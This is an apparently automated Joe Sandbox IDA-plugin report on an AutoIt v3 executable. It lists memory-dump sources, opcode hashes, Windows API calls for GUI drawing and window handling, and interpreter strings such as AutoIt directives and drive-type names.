                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                • Instruction ID: 233c8f825a3e6f91d1ef19180d56b08b66e4c4f746444a965e1bf990d96041ff
                                                • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                • Instruction Fuzzy Hash: 2DC182B26051A30ADF6D463EC43413EBBA16FA37B131B076DD4B2DB1D4EE24D925B620
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                • Instruction ID: 2153078f276358b4c7735e55a44f74cab53adf836a34f04396e3c421e7b12396
                                                • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                • Instruction Fuzzy Hash: 22C191B26091A309DF2D463AC43413EBAA17FA37B171B176DD4B3DB1C4EE20D925E620
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2208151613.0000000001993000.00000040.00000020.00020000.00000000.sdmp, Offset: 01993000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1993000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                • Instruction ID: 165641929ab4ef4c70d20b0667241fe9cf4d65772aaf3a9aa6f8ff9a1e955bd4
                                                • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                • Instruction Fuzzy Hash: A441D271D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB80
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2208151613.0000000001993000.00000040.00000020.00020000.00000000.sdmp, Offset: 01993000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1993000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                • Instruction ID: 270bda38f62a0b9a470ac344b033191dd19179268537a3c3a850935ebfe3bac6
                                                • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                • Instruction Fuzzy Hash: 9C019278A01209EFCB44DF98C5909AEF7B5FB48310F208599D819A7301D730AE51DB80
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2208151613.0000000001993000.00000040.00000020.00020000.00000000.sdmp, Offset: 01993000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1993000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                • Instruction ID: 44db99a752bb96ad1e3415b2a06046219dc05f3da6140c6083271b1c8ba74516
                                                • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                • Instruction Fuzzy Hash: F201A478A01209EFCB44DF98C5909AEF7F5FF88310F208599D819A7301E730AE41DB80
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2208151613.0000000001993000.00000040.00000020.00020000.00000000.sdmp, Offset: 01993000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1993000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                APIs
                                                • DeleteObject.GDI32(00000000), ref: 00FF785B
                                                • DeleteObject.GDI32(00000000), ref: 00FF786D
                                                • DestroyWindow.USER32 ref: 00FF787B
                                                • GetDesktopWindow.USER32 ref: 00FF7895
                                                • GetWindowRect.USER32(00000000), ref: 00FF789C
                                                • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00FF79DD
                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00FF79ED
                                                • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FF7A35
                                                • GetClientRect.USER32(00000000,?), ref: 00FF7A41
                                                • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00FF7A7B
                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FF7A9D
                                                • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FF7AB0
                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FF7ABB
                                                • GlobalLock.KERNEL32(00000000), ref: 00FF7AC4
                                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FF7AD3
                                                • GlobalUnlock.KERNEL32(00000000), ref: 00FF7ADC
                                                • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FF7AE3
                                                • GlobalFree.KERNEL32(00000000), ref: 00FF7AEE
                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FF7B00
                                                • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,01012CAC,00000000), ref: 00FF7B16
                                                • GlobalFree.KERNEL32(00000000), ref: 00FF7B26
                                                • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00FF7B4C
                                                • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00FF7B6B
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FF7B8D
                                                • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FF7D7A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                • String ID: $AutoIt v3$DISPLAY$static
                                                • API String ID: 2211948467-2373415609
                                                • Opcode ID: b26f5961afd95107a5cb1543a3fe03fa9802ee746a62d2c767fa2c54b3e3867a
                                                • Instruction ID: 8e683b60c73639fe84f8a6a7acf9c51a23a6008bcc5796441faf48ca1f8443bc
                                                • Opcode Fuzzy Hash: b26f5961afd95107a5cb1543a3fe03fa9802ee746a62d2c767fa2c54b3e3867a
                                                • Instruction Fuzzy Hash: B5029071900209AFDB24EFA4CD89EBEBBB9FF49310F144159F945AB2A0C7759D01EB60
                                                APIs
                                                • CharUpperBuffW.USER32(?,?,0100F910), ref: 01003627
                                                • IsWindowVisible.USER32(?), ref: 0100364B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: BuffCharUpperVisibleWindow
                                                • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                • API String ID: 4105515805-45149045
                                                • Opcode ID: 6525706f67da019742c7952dbaf81df978389324464a7ba29226f564cc5c6e85
                                                • Instruction ID: 89831c49e997d8549087c778fdfbbd74f5c21c8e9fca69cb2cc46b59555db1cc
                                                • Opcode Fuzzy Hash: 6525706f67da019742c7952dbaf81df978389324464a7ba29226f564cc5c6e85
                                                • Instruction Fuzzy Hash: 6ED19F702083018FEA16EF14C855A6E7BE6BF85384F084458F8C65F3E2CB79E94ADB41
                                                APIs
                                                • SetTextColor.GDI32(?,00000000), ref: 0100A630
                                                • GetSysColorBrush.USER32(0000000F), ref: 0100A661
                                                • GetSysColor.USER32(0000000F), ref: 0100A66D
                                                • SetBkColor.GDI32(?,000000FF), ref: 0100A687
                                                • SelectObject.GDI32(?,00000000), ref: 0100A696
                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 0100A6C1
                                                • GetSysColor.USER32(00000010), ref: 0100A6C9
                                                • CreateSolidBrush.GDI32(00000000), ref: 0100A6D0
                                                • FrameRect.USER32(?,?,00000000), ref: 0100A6DF
                                                • DeleteObject.GDI32(00000000), ref: 0100A6E6
                                                • InflateRect.USER32(?,000000FE,000000FE), ref: 0100A731
                                                • FillRect.USER32(?,?,00000000), ref: 0100A763
                                                • GetWindowLongW.USER32(?,000000F0), ref: 0100A78E
                                                  • Part of subcall function 0100A8CA: GetSysColor.USER32(00000012), ref: 0100A903
                                                  • Part of subcall function 0100A8CA: SetTextColor.GDI32(?,?), ref: 0100A907
                                                  • Part of subcall function 0100A8CA: GetSysColorBrush.USER32(0000000F), ref: 0100A91D
                                                  • Part of subcall function 0100A8CA: GetSysColor.USER32(0000000F), ref: 0100A928
                                                  • Part of subcall function 0100A8CA: GetSysColor.USER32(00000011), ref: 0100A945
                                                  • Part of subcall function 0100A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0100A953
                                                  • Part of subcall function 0100A8CA: SelectObject.GDI32(?,00000000), ref: 0100A964
                                                  • Part of subcall function 0100A8CA: SetBkColor.GDI32(?,00000000), ref: 0100A96D
                                                  • Part of subcall function 0100A8CA: SelectObject.GDI32(?,?), ref: 0100A97A
                                                  • Part of subcall function 0100A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0100A999
                                                  • Part of subcall function 0100A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0100A9B0
                                                  • Part of subcall function 0100A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0100A9C5
                                                  • Part of subcall function 0100A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0100A9ED
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                • String ID:
                                                • API String ID: 3521893082-0
                                                • Opcode ID: 2501f5e933d3a85901cb98661133ec5f35f112abf6e05b09fe0659a4a271c7fe
                                                • Instruction ID: 3e109458efcd952b1a15077adc40d9a6d0021e4d823ceb2dbc9d40d55d06ecfb
                                                • Opcode Fuzzy Hash: 2501f5e933d3a85901cb98661133ec5f35f112abf6e05b09fe0659a4a271c7fe
                                                • Instruction Fuzzy Hash: 6C919C72108302EFE7629F64DC08A5B7BE9FF89321F004B19FAA6961D0D736D944DB51
                                                APIs
                                                • DestroyWindow.USER32(00000000), ref: 00FF74DE
                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00FF759D
                                                • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00FF75DB
                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00FF75ED
                                                • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00FF7633
                                                • GetClientRect.USER32(00000000,?), ref: 00FF763F
                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00FF7683
                                                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00FF7692
                                                • GetStockObject.GDI32(00000011), ref: 00FF76A2
                                                • SelectObject.GDI32(00000000,00000000), ref: 00FF76A6
                                                • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00FF76B6
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00FF76BF
                                                • DeleteDC.GDI32(00000000), ref: 00FF76C8
                                                • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00FF76F4
                                                • SendMessageW.USER32(00000030,00000000,00000001), ref: 00FF770B
                                                • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00FF7746
                                                • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00FF775A
                                                • SendMessageW.USER32(00000404,00000001,00000000), ref: 00FF776B
                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00FF779B
                                                • GetStockObject.GDI32(00000011), ref: 00FF77A6
                                                • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00FF77B1
                                                • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00FF77BB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                • API String ID: 2910397461-517079104
                                                • Opcode ID: a1f302e429062016d26e93929ea056f72b9c040c016dd6b3cbb58298655a18fe
                                                • Instruction ID: 4d66751929ed29371ad39a9abde0b337a661459e26c589dafce6da12d927e70e
                                                • Opcode Fuzzy Hash: a1f302e429062016d26e93929ea056f72b9c040c016dd6b3cbb58298655a18fe
                                                • Instruction Fuzzy Hash: 14A171B1A40209BFEB24DBA4DD4AFAEBBB9EF05710F044115FA54A72D0C775AD00DB60
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 00FEAD1E
                                                • GetDriveTypeW.KERNEL32(?,0100FAC0,?,\\.\,0100F910), ref: 00FEADFB
                                                • SetErrorMode.KERNEL32(00000000,0100FAC0,?,\\.\,0100F910), ref: 00FEAF59
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: ErrorMode$DriveType
                                                • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                • API String ID: 2907320926-4222207086
                                                • Opcode ID: 88ccc0358489f2f7c64c7f61b97b203e84e4745715c3fa21fec892df91d3409c
                                                • Instruction ID: 5bc15a9ca9b7c654e8570394214ef77b706816e3cd35fe641aebbc8517096820
                                                • Opcode Fuzzy Hash: 88ccc0358489f2f7c64c7f61b97b203e84e4745715c3fa21fec892df91d3409c
                                                • Instruction Fuzzy Hash: 5651C3B1A486859BCB14EB13CD42DBD73A4EF88710B24829AF447AB250C675BD02FB53
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: __wcsnicmp
                                                • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                • API String ID: 1038674560-86951937
                                                • Opcode ID: 65c69e091743bd8e0ccdaf574c4d7969dcc73fca208e67ac770bcee0c228a815
                                                • Instruction ID: 0dfe322eac150affd9354a69a71baf5c4bea597df50b1f4825a18a6be0a685b8
                                                • Opcode Fuzzy Hash: 65c69e091743bd8e0ccdaf574c4d7969dcc73fca208e67ac770bcee0c228a815
                                                • Instruction Fuzzy Hash: A0812AB16002056BDF21BB62DC83FEE37A8AF15710F044025F945AA186EB68DE05F751
                                                APIs
                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 01009AD2
                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 01009B8B
                                                • SendMessageW.USER32(?,00001102,00000002,?), ref: 01009BA7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window
                                                • String ID: 0
                                                • API String ID: 2326795674-4108050209
                                                • Opcode ID: e0c70633b6549e96f2ed34a4a40b4a27deb3e6b5bf519550637fd34256f4de34
                                                • Instruction ID: 33ea72b9bd58dc00e9a28211d47f08f191b3313fb2af429bc2572c35420acab8
                                                • Opcode Fuzzy Hash: e0c70633b6549e96f2ed34a4a40b4a27deb3e6b5bf519550637fd34256f4de34
                                                • Instruction Fuzzy Hash: 8302CD70104241AFFB66CF28C848BAABBE5FF89318F04855DFAD9962E2C735D944CB51
                                                APIs
                                                • GetSysColor.USER32(00000012), ref: 0100A903
                                                • SetTextColor.GDI32(?,?), ref: 0100A907
                                                • GetSysColorBrush.USER32(0000000F), ref: 0100A91D
                                                • GetSysColor.USER32(0000000F), ref: 0100A928
                                                • CreateSolidBrush.GDI32(?), ref: 0100A92D
                                                • GetSysColor.USER32(00000011), ref: 0100A945
                                                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0100A953
                                                • SelectObject.GDI32(?,00000000), ref: 0100A964
                                                • SetBkColor.GDI32(?,00000000), ref: 0100A96D
                                                • SelectObject.GDI32(?,?), ref: 0100A97A
                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 0100A999
                                                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0100A9B0
                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 0100A9C5
                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0100A9ED
                                                • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0100AA14
                                                • InflateRect.USER32(?,000000FD,000000FD), ref: 0100AA32
                                                • DrawFocusRect.USER32(?,?), ref: 0100AA3D
                                                • GetSysColor.USER32(00000011), ref: 0100AA4B
                                                • SetTextColor.GDI32(?,00000000), ref: 0100AA53
                                                • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0100AA67
                                                • SelectObject.GDI32(?,0100A5FA), ref: 0100AA7E
                                                • DeleteObject.GDI32(?), ref: 0100AA89
                                                • SelectObject.GDI32(?,?), ref: 0100AA8F
                                                • DeleteObject.GDI32(?), ref: 0100AA94
                                                • SetTextColor.GDI32(?,?), ref: 0100AA9A
                                                • SetBkColor.GDI32(?,?), ref: 0100AAA4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                • String ID:
                                                • API String ID: 1996641542-0
                                                • Opcode ID: d9049a190ade5c3346673315959ab8238296b35bddb0a2e5cd8e4171c3e23251
                                                • Instruction ID: 5f339ab5e5e9ae12fc9cc9a2235db5dd323b4ea0f2136a923a0cc19ef7784eb9
                                                • Opcode Fuzzy Hash: d9049a190ade5c3346673315959ab8238296b35bddb0a2e5cd8e4171c3e23251
                                                • Instruction Fuzzy Hash: 56515D71900209FFEF22DFA4DC48EAE7BB9EB09320F114215FA51AB295D7769940DF90
                                                APIs
                                                • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 01008AC1
                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 01008AD2
                                                • CharNextW.USER32(0000014E), ref: 01008B01
                                                • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 01008B42
                                                • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 01008B58
                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 01008B69
                                                • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 01008B86
                                                • SetWindowTextW.USER32(?,0000014E), ref: 01008BD8
                                                • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 01008BEE
                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 01008C1F
                                                • _memset.LIBCMT ref: 01008C44
                                                • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 01008C8D
                                                • _memset.LIBCMT ref: 01008CEC
